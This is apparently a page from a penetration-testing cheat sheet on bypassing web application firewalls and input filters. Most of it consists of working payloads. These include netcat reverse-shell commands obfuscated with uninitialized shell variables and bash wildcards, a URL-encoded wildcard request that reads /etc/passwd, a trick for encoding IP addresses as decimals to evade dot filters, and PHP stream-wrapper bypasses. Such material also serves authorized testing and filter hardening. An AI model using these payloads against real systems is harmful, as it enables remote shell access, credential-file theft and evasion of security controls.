Web Filter Bypass
Last updated
Last updated
Uninitialized shell variables can be used for bypassing web application firewalls (WAF). Example: bypassing a filter to execute a reverse shell - nc$u -e /bin$u/bash$u <ip> <port>
. If this doesn't work try adding spaces before and after the variable (note the +
's, this example is also URL encoded): nc+$u++-e+/bin$u/bash$u <ip> <port>
($u
in this case is a random attacker-picked variable that would hopefully be uninitialized on the target).
Bypass web filters by using bash wildcards:/???/?s
/?cmd=%2f???%2f??t%20%2f???%2fp??s??
will bypass...and execute every command that matches. such as /bin/cat /etc/apt
, and /bin/cat /etc/passwd
netcat firewall bypass: /???/n? -e /???/b??h 2130706433 1337
(/???/?c.??????????? -e /???/b??h 2130706433 1337
for nc traditional)
It is still understood by most programs and languages when converted to other formats, such as decimal, and avoids .
character in filtered HTTP requests: 127.0.0.1 = 2130706433
Injecting IPs when .
is disallowed: convert dotted-decimal format to decimal value - ip2dh
From PayloadsAllTheThings php://filter/
has multiple ways to bypass PHP input filters ;These can be chained with |
or /
: zip, data, expect, input, phar; many more different wrappers to try!